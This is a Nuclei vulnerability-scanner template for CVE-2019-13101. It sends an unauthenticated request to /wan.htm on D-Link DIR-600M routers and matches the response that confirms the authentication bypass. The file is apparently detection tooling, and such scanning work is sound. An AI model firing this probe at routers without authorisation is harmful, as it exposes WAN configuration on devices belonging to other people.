nuclei-templates/cves/2019/CVE-2019-13101.yaml

32 lines
1.0 KiB
YAML

id: CVE-2019-13101
info:
author: Suman_Kar
name: D-Link DIR-600M - Authentication Bypass
description: An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page.
severity: critical
tags: cve,cve2019,dlink,router,iot
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-13101
- https://github.com/d0x0/D-Link-DIR-600M
- https://www.exploit-db.com/exploits/47250
requests:
- raw:
- |
GET /wan.htm HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "/PPPoE/"
part: body